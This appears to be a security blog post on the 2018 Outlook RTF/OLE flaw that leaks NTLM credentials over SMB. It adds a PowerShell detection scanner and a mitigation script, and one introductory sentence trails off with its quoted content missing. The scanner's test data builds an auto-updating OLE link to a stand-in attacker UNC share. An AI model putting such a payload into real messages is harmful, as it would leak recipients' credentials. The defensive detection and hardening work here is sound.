Microsoft Outlook – incomplete patching of the security vulnerability

April 12, 2018

The most recent ‘Patch Tuesday’ (the second Tuesday of the month, on which Microsoft has traditionally published its security updates since 2003) brought patches for a number of Microsoft products, among them MS Outlook. Two of them are described as:

The above vulnerability was reported and described by Will Dormann of the CERT Coordination Center (CERT/CC) in the United States. He described the risk of unauthorized disclosure of sensitive information from Microsoft Outlook, including the user’s login credentials. The cause was the automatic rendering of OLE (Object Linking and Embedding) objects embedded in RTF (Rich Text Format) messages whenever such a message was opened or merely shown in the preview pane. A linked OLE object can point to a UNC path on a host controlled by the attacker, so Outlook initiated an SMB connection to that host without any interaction from the user beyond viewing the message. Because an SMB connection authenticates with the user’s NTLM credentials, the attacker’s server receives a credential hash that can be cracked offline or relayed.
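The pattern described above, as an added example that is not code from the original article or from CERT/CC: a PowerShell function that scans an RTF body for OLE objects (`\object` groups with hex-encoded `\objdata`) whose payload carries a UNC path, and reports whether the object is a link (OLE 1.0 FormatID = 1) and whether `\objupdate` asks the reader to refresh it automatically. The sample message at the bottom is constructed here with a helper that builds a minimal OLE 1.0 link header; 203.0.113.5 is a documentation address, not a real host.

```powershell
# Added example: RTF scanner for linked OLE objects pointing at UNC paths.
# Not code from the original article; the sample RTF below is constructed.

function ConvertFrom-HexString {
    # Turns the hex run inside \objdata into a byte array (whitespace and
    # line breaks inside the run are ignored; a dangling nibble is dropped).
    param([Parameter(Mandatory)][string]$Hex)
    $clean = $Hex -replace '[^0-9A-Fa-f]', ''
    if ($clean.Length % 2 -eq 1) { $clean = $clean.Substring(0, $clean.Length - 1) }
    $bytes = New-Object byte[] ($clean.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($clean.Substring(2 * $i, 2), 16)
    }
    return ,$bytes
}

function Get-RtfUncObjects {
    # Returns one record per OLE object whose decoded \objdata contains a UNC path.
    # OLE 1.0 ObjectHeader (MS-OLEDS): OLEVersion (4 bytes), FormatID (4 bytes,
    # 1 = linked object, 2 = embedded), then length-prefixed ClassName, TopicName, ItemName.
    param([Parameter(Mandatory)][string]$Rtf)

    $findings = @()
    foreach ($m in [regex]::Matches($Rtf, '\\objdata\s*([0-9A-Fa-f\s]+)')) {
        $bytes = ConvertFrom-HexString $m.Groups[1].Value
        if ($bytes.Length -lt 8) { continue }

        $formatId = [BitConverter]::ToUInt32($bytes, 4)
        $text     = [System.Text.Encoding]::ASCII.GetString($bytes)

        # The control words of the enclosing \object group sit between '\object' and this \objdata.
        $start = $Rtf.LastIndexOf('\object', $m.Index)
        $flags = if ($start -ge 0) { $Rtf.Substring($start, $m.Index - $start) } else { '' }

        foreach ($u in [regex]::Matches($text, '\\\\[A-Za-z0-9._-]+\\[^\x00\s]+')) {
            $findings += [pscustomobject]@{
                UncPath    = $u.Value
                LinkedOle  = ($formatId -eq 1)
                AutoUpdate = ($flags -match '\\objupdate')
            }
        }
    }
    return $findings
}

function New-Ole1LinkHex {
    # Constructed test data only: hex of a minimal OLE 1.0 header for a linked object.
    param([string]$ClassName, [string]$TopicName)
    function LengthPrefixed([string]$s) {
        $b = [System.Text.Encoding]::ASCII.GetBytes($s + "`0")
        [BitConverter]::GetBytes([uint32]$b.Length) + $b
    }
    $bytes = [BitConverter]::GetBytes([uint32]0x00000501) +   # OLEVersion
             [BitConverter]::GetBytes([uint32]1) +            # FormatID 1 = linked
             (LengthPrefixed $ClassName) +
             (LengthPrefixed $TopicName) +                    # UNC path of the link target
             [BitConverter]::GetBytes([uint32]0)              # empty ItemName
    ($bytes | ForEach-Object { $_.ToString('x2') }) -join ''
}

# Constructed sample: an auto-updating OLE link to an attacker-style UNC path.
$sampleRtf = '{\rtf1\ansi{\object\objautlink\objupdate{\*\objclass Word.Document.8}{\*\objdata ' +
             (New-Ole1LinkHex -ClassName 'Word.Document.8' -TopicName '\\203.0.113.5\share\invoice.docx') +
             '}}}'

Get-RtfUncObjects -Rtf $sampleRtf | Format-Table -AutoSize
```

The same function can be pointed at RTF bodies pulled from a mail store or a quarantine folder; a hit with both `LinkedOle` and `AutoUpdate` set is exactly the no-click case the advisory describes, while a link without `\objupdate` still matters once a user clicks it.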

Microsoft’s partial patch – how to fix the issue?

Installing the patch only partially solves the problem: it stops Outlook from automatically initiating SMB connections when an RTF message is rendered, but it does not close other ways of exploiting the same weakness, for example a link embedded in the message that the user clicks, which still sends the user’s NTLM credentials to a remote SMB server. It is therefore recommended to additionally block the ports used by SMB sessions at the network border, i.e., 445/tcp, 137/tcp and 139/tcp, as well as 137/udp and 139/udp. Restricting NT LAN Manager (NTLM) single sign-on (SSO), so that NTLM credentials are not sent to remote servers, is also advisable. Finally, the traditional recommendation: always use complex (difficult to crack) passwords, since a captured NTLM hash is only as strong as the password behind it.
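The two host-side mitigations above, applied on a Windows endpoint, as an added example that is not part of the original article: firewall rules blocking outbound SMB/NetBIOS ports and the NTLM policy that denies outgoing NTLM to remote servers. The rule names are my own; the registry value corresponds to the Group Policy setting “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers”.

```powershell
# Added example: endpoint mitigations for the Outlook SMB credential leak.
# Not code from the original article. Run from an elevated PowerShell session.
#Requires -RunAsAdministrator

# 1. Block outbound SMB and NetBIOS session/name-service ports (rule names are assumptions).
$smbPorts = @(
    @{ Protocol = 'TCP'; Port = 445 },
    @{ Protocol = 'TCP'; Port = 137 },
    @{ Protocol = 'TCP'; Port = 139 },
    @{ Protocol = 'UDP'; Port = 137 },
    @{ Protocol = 'UDP'; Port = 139 }
)

foreach ($p in $smbPorts) {
    $name = "Block outbound SMB $($p.Protocol)/$($p.Port)"
    # Idempotent: skip rules that already exist so the script can be re-run.
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Action Block `
            -Protocol $p.Protocol -RemotePort $p.Port -Profile Any | Out-Null
    }
}

# 2. Deny outgoing NTLM to remote servers.
#    RestrictSendingNTLMTraffic: 0 = allow all, 1 = audit all, 2 = deny all.
#    Start with 1 (audit) in an environment that still has NTLM-only servers.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
New-ItemProperty -Path $lsa -Name RestrictSendingNTLMTraffic `
    -PropertyType DWord -Value 2 -Force | Out-Null

# 3. Read back what was applied.
Get-NetFirewallRule -DisplayName 'Block outbound SMB*' |
    Get-NetFirewallPortFilter |
    Select-Object Protocol, RemotePort
Get-ItemProperty -Path $lsa -Name RestrictSendingNTLMTraffic |
    Select-Object RestrictSendingNTLMTraffic
```

Caveat: with `-RemoteAddress` left at its default of Any, these rules also block file shares and SYSVOL access inside a domain. On domain-joined machines scope them to external address ranges with `-RemoteAddress`, or block the ports at the network border as CERT/CC recommends, and leave the endpoint rules for roaming laptops.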

Source: The Hacker News


Published by: Piotr Mierzwiński
